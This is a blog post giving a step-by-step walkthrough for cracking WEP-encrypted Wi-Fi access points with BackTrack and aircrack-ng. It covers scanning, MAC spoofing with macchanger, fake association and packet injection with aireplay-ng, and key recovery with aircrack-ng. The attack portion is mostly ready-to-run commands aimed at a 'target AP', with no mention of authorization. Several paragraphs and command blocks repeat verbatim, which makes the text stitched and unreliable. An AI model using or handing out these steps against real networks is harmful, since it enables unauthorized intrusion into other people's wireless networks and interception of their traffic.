For this first post I'm going to do a brief scenario of how to break 802.11 WEP encrypted access points. I won't go into much detail at this time, I plan on doing a more detailed version soon including WAP and other forms of 802.11 encryption.
First off go get yourself a copy of the BackTrack LiveCD. BackTrack is the best network security toolkit I have found to date, including my own personal build! I will be using BackTrack2 for this post but BackTrack3 Beta should be very similar.
------------------------------------------------
First off boot into BackTrack and follow the directions on the screen. Login as "root" with "toor" as your password, then type "startx" to start Gnome. The only reason we are starting X is simply to allow ease of multiple terminals. All of the steps to crack your WEP AP will be done in a terminal.
First thing we are going to do is see what access points are available using AiroDump. You do this by opening a terminal and typing the following (my card is wlan0, yours may vary depending on the manufacturer):
[root@codedrunk ~]# airodump-ng wlan0
You will see a list of access points, their power level in relation to you, their channel, MAC address, ESSID, and type of encryption being used. For now you will need to remember the ESSID, MAC Address, and channel.
** This step is entirely optional. I change the MAC of my wireless card just to make it easier later when I'll be typing it quite a bit. To do this use the following commands:
[root@codedrunk ~]# airmon-ng stop wlan0
[root@codedrunk ~]# ifconfig wlan0 down
[root@codedrunk ~]# macchanger --mac 00:11:22:33:44:55 wlan0
[root@codedrunk ~]# airmon-ng start wlan0
Now our MAC address is much easier to type and remember!
Now that we have our target access point we will need to start capturing packets. To do this we will again use AiroDump with a few options:
[root@codedrunk ~]# airodump-ng -C 10 -w dump_file_name --bssid SSIDofTargetAP
"-C 10" refers to the channel the AP is using, "-w dump_file_name" is the text file where the packets will be captured, and "--bssid SSIDofTargetAP" is the ESSID found when we used AiroDump the first time. Here is an example of how it looks on my end:
[root@codedrunk ~]# airodump-ng -C 10 -w codedrunktest --bssid codedrunk31
First thing we are going to do is see what access points are available using AiroDump. You do this by opening a terminal and typing the following (my card is wlan0, yours may vary depending on the manufacturer):
[root@codedrunk ~]# airodump-ng wlan0
You will see a list of access points, their power level in relation to you, their channel, MAC address, ESSID, and type of encryption being used. For now you will need to remember the ESSID, MAC Address, and channel.
** This step is entirely optional. I change the MAC of my wireless card just to make it easier later when I'll be typing it quite a bit. To do this use the following commands:
[root@codedrunk ~]# airmon-ng stop wlan0
[root@codedrunk ~]# ifconfig wlan0 down
[root@codedrunk ~]# macchanger --mac 00:11:22:33:44:55 wlan0
[root@codedrunk ~]# airmon-ng start wlan0
Now our MAC address is much easier to type and remember!
Now that we have our target access point we will need to start capturing packets. To do this we will again use AiroDump with a few options:
[root@codedrunk ~]# airodump-ng -C 10 -w dump_file_name --bssid SSIDofTargetAP
"-C 10" refers to the channel the AP is using, "-w dump_file_name" is the text file where the packets will be captured, and "--bssid SSIDofTargetAP" is the ESSID found when we used AiroDump the first time. Here is an example of how it looks on my end:
[root@codedrunk ~]# airodump-ng -C 10 -w codedrunktest --bssid codedrunk31
------------------------------------------------
Now that we have AiroDump capturing packets we need to stimulate a little network traffic. There are many ways of doing this, here I will show you the easiest method that doesn't require a client connected on the target network.
Leave AiroDump running and open another terminal. In this terminal we will use AiReplay to associate our wireless card with the target AP:
[root@codedrunk ~]# aireplay-ng -1 0 -e SSIDofTargetAP -a MACofTargetAP -h 00:11:22:33:44:55 wlan0
Here's how it looks on my end:
[root@codedrunk ~]# aireplay-ng -1 0 -e codedrunk31 -a 00:c4:32:77:fa:9d -h 00:11:22:33:44:55 wlan0
You should get a message stating the association was successful, and we're on to the next step.
Now we'll start injecting packets to get network traffic flowing and reduce the amount of time needed to capture enough good packets to obtain the encryption key.
[root@codedrunk ~]# aireplay-ng -3 -b MACofTargetAP -h 00:11:22:33:44:55 wlan0
Now that we're injecting and capturing packets we can start the actual crack.
[root@codedrunk ~]# aircrack-ng -b MACofTargetAP dump_file_name.cap
Here's what it looks like on my end:
[root@codedrunk ~]# aircrack-ng -b 00:c4:32:77:fa:9d codedrunktest.cap
Depending on your rate of capture you could have your WEP key in as little as 2 minutes! My next walk through will be similar with the exception of including images. Enjoy!
Leave AiroDump running and open another terminal. In this terminal we will use AiReplay to associate our wireless card with the target AP:
[root@codedrunk ~]# aireplay-ng -1 0 -e SSIDofTargetAP -a MACofTargetAP -h 00:11:22:33:44:55 wlan0
Here's how it looks on my end:
[root@codedrunk ~]# aireplay-ng -1 0 -e codedrunk31 -a 00:c4:32:77:fa:9d -h 00:11:22:33:44:55 wlan0
You should get a message stating the association was successful, and we're on to the next step.
Now we'll start injecting packets to get network traffic flowing and reduce the amount of time needed to capture enough good packets to obtain the encryption key.
[root@codedrunk ~]# aireplay-ng -3 -b MACofTargetAP -h 00:11:22:33:44:55 wlan0
Now that we're injecting and capturing packets we can start the actual crack.
[root@codedrunk ~]# aircrack-ng -b MACofTargetAP dump_file_name.cap
Here's what it looks like on my end:
[root@codedrunk ~]# aircrack-ng -b 00:c4:32:77:fa:9d codedrunktest.cap
Depending on your rate of capture you could have your WEP key in as little as 2 minutes! My next walk through will be similar with the exception of including images. Enjoy!
0 comments:
Post a Comment